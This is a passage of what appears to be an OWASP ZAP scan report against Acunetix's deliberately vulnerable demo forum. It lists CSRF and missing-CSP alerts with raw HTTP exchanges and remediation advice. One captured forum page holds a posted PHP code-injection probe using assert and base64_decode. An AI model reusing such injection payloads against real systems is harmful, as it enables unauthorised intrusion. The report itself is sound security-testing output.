Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 59 Origin: http://testasp.vulnweb.com Connection: keep-alive Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 59 bytes. |
tfUName=MnBpwKYW&tfRName=PNjwtkrs&tfEmail=ATsuFRAP&tfUPass=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:56 GMT Content-Length: 3673 |
Response Body - size: 3,673 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
Method | POST |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 4174 |
Response Body - size: 4,174 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
Instances | 275 |
Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
For example, use anti-CSRF packages such as the OWASP CSRFGuard.
Phase: Implementation
Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.
Phase: Architecture and Design
Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).
Note that this can be bypassed using XSS.
Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.
Note that this can be bypassed using XSS.
Use the ESAPI Session Management control.
This control includes a component for CSRF.
Do not use the GET method for any request that triggers a state change.
Phase: Implementation
Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
|
Reference |
http://projects.webappsec.org/Cross-Site-Request-Forgery
http://cwe.mitre.org/data/definitions/352.html |
Tags |
OWASP_2021_A01
WSTG-v42-SESS-05 OWASP_2017_A05 |
CWE Id | 352 |
WASC Id | 9 |
Plugin Id | 10202 |
Medium |
Content Security Policy (CSP) Header Not Set |
---|---|
Description |
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page — covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.
|
URL | http://testasp.vulnweb.com |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 213 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD; path=/ X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3541 |
Response Body - size: 3,541 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>84</td><td>84</td><td>12/14/2022 3:23:34 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/ |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 214 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDASSBRCRC=EKIMIJFAFCFMONCJOBLJPEKD; path=/ X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:37 GMT Content-Length: 3541 |
Response Body - size: 3,541 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>84</td><td>84</td><td>12/14/2022 3:23:34 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/* |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 328 bytes. |
GET http://testasp.vulnweb.com/* HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=58 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 1245 |
Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Default.asp |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 317 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3541 |
Response Body - size: 3,541 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>84</td><td>84</td><td>12/14/2022 3:23:34 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/favicon.ico |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/favicon.ico HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: image/avif,image/webp,*/* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/ Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN |
Request Body - size: 0 bytes. |
|
Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:32 GMT Content-Length: 1245 |
Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 342 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3198 |
Response Body - size: 3,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 352 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3196 |
